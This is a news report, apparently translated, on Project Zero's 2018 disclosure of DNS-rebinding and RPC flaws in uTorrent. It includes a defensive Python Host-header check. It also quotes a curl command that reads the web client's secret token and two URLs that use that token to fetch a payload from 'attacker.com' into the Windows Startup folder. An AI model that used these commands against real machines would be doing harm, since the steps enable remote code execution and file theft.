
Several dangerous, easy-to-exploit vulnerabilities have been discovered in two versions of uTorrent: the Windows client and the web version, uTorrent Web. They allow an attacker to run arbitrary code on a machine running uTorrent (web version) and to access downloaded files, including copying them and viewing the download history (web version and Windows).
Exploitation is possible only if uTorrent runs with default settings, namely with the HTTP RPC server on port 10000 (uTorrent Classic) or 19575 (web version of uTorrent) and with the /proxy/ handler enabled (it is enabled by default).
The bugs were found by the hacker Tavis Ormandy of Project Zero at Google. He disclosed the information in the Chromium bug tracker on January 31, 2018 (90 days after he informed the developers about it).
As Tavis writes, any website can interact with the above RPC servers through the XMLHttpRequest() programming interface. This API sends HTTP or HTTPS requests directly to the server and loads the server's response data directly into the calling script. The interface lets a page make HTTP requests to a server without reloading and is used on many modern sites.
To attack a machine where uTorrent is running, the attacker needs to lure the user to a web page that hosts the exploit. It can be absolutely any site. Using DNS rebinding, the exploit makes the browser run a script that accesses this RPC server via XMLHttpRequest().
The demo page provides examples of the actions a website can initiate through the JSON RPC server interface on port 10000. Here, standard uTorrent commands are sent via the XMLHttpRequest() programming interface.
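A common defense against DNS rebinding for a loopback RPC server like the one described above is to reject any request whose Host header does not name the loopback service itself. The following is an added example, not uTorrent's code or its patch; the `RpcHandler` class, the allowlist and the sample Host values are assumptions made for illustration.

```python
import ipaddress
from http.server import BaseHTTPRequestHandler

RPC_PORT = 10000               # uTorrent Classic RPC port named in the article
ALLOWED_NAMES = {"localhost"}  # assumption: names the local UI legitimately uses


def split_host(header):
    """Split a Host header into (hostname, port); port is None when absent."""
    header = header.strip()
    if header.startswith("["):                 # bracketed IPv6 literal
        name, _, rest = header[1:].partition("]")
        port = rest[1:] if rest.startswith(":") else ""
    else:
        name, _, port = header.partition(":")
    valid_port = port.isascii() and port.isdigit()
    return name.lower().rstrip("."), int(port) if valid_port else None


def host_is_local(header, expected_port=RPC_PORT):
    """True only if the Host header names this loopback service itself."""
    if not header:
        return False
    name, port = split_host(header)
    if port != expected_port:
        return False
    if name in ALLOWED_NAMES:
        return True
    try:
        return ipaddress.ip_address(name).is_loopback
    except ValueError:   # any other DNS name, e.g. a rebinding domain
        return False


class RpcHandler(BaseHTTPRequestHandler):
    """Hypothetical local RPC handler that checks Host before dispatching."""

    def do_GET(self):
        if not host_is_local(self.headers.get("Host")):
            self.send_error(403, "Host header not allowed")
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok\n")
```

During a rebinding attack the browser still sends the attacker's domain in the Host header, even though the name now resolves to 127.0.0.1, so the check fails and the request is refused before any command is dispatched.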
Tavis writes that while studying the various commands of the uTorrent client, he noticed that the /proxy/ handler is active with default settings, which allows a third-party site to view the list of downloaded files and copy them. That is, by default, uTorrent allows any site to check the list of torrents you have downloaded; the site only needs to guess one small number (sid), which is assigned to each open torrent in turn.
Ormandy made a demo page. The hacker says the demo is slow, but if you still want to see the trick, do the following:
- Install uTorrent with default settings.
- Add a torrent from the URL: https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent
- When the torrent has finished downloading (it is only 5 MB), go to the demo page.
- Wait a few minutes.
While studying uTorrent, Tavis found a couple more bugs and flaws in it: for example, an incorrect pseudo-random number generator, disabled ASLR memory protection, and incorrect behavior in "guest" mode, where many functions should be disabled but are in fact available through the same server on port 10000.
In the web version, the vulnerability is even more severe, because any third-party site can obtain the authentication token, whose secret is stored in the openly accessible webroot folder (along with settings, dumps, logs, etc.). This surprised Tavis Ormandy very much.
```
$ curl -si http://localhost:19575/users.conf
HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 19:46:44 GMT
Last-Modified: Wed, 31 Jan 2018 19:37:50 GMT
Etag: "5a721b0e.92"
Content-Type: text/plain
Content-Length: 92
Connection: close
Accept-Ranges: bytes

localapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1
```
With the secret, an attacker can remotely change the download directory and issue a command to download an arbitrary file. For example, to place malicious code in the startup folder:
```
http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup
http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent
```
Developers from BitTorrent, Inc. have already released a patch for uTorrent under Windows. So far, it is only available in the beta version of uTorrent / BitTorrent 3.5.3.44352, which should soon be distributed through the automatic update mechanism. Users of uTorrent Web need to upgrade to the latest build, 0.12.0.502.
uTorrent is one of the most popular torrent clients and is written in C++. It is small and fast while offering a fairly large feature set. The first version was released on September 18, 2005. It is now available for all major operating systems, and the number of users exceeds 100 million. In the first versions, the author tried to make money from contextual advertising; the program was then bought by BitTorrent, which monetized it by bundling toolbars, adware and Yandex Browser (in the Russian version).